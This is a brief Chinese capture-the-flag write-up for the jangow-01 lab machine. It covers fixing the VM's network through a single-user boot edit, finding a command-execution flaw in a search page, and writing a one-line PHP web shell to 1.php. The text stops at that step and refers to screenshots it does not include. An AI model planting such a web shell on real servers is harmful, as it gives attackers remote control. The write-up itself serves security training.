jangow-01-1.0.1靶机
一、找ip和端口
我们发现只能扫描出主机的IP,可能是虚拟网卡配置的问题。尝试去修改一下虚拟网卡配置问题。
重启虚拟机,在启动时按住shift,出现了下面这个界面后按e,然后找到ro修改成rw single init=/bin/bash。
修改完后按Ctrl + X ,输入ip a 查看网卡ens33,然后cd 到etc/network,然后vim interfaces。修改内容如下图。(注意:要一级一级去cd)
这样就可以扫描到我们的ip和端口了。
访问一下主页。
二、利用漏洞
点site出现了下面的页面,把页面上的按钮点个遍,发现点击右上角的“buscar”按钮会跳转,
尝试输个id,发现了命令执行漏洞。
利用漏洞输入一句话木马,然后访问1.php,用工具去连接。
echo '<?php @eval($_POST[a]);?>' > 1.php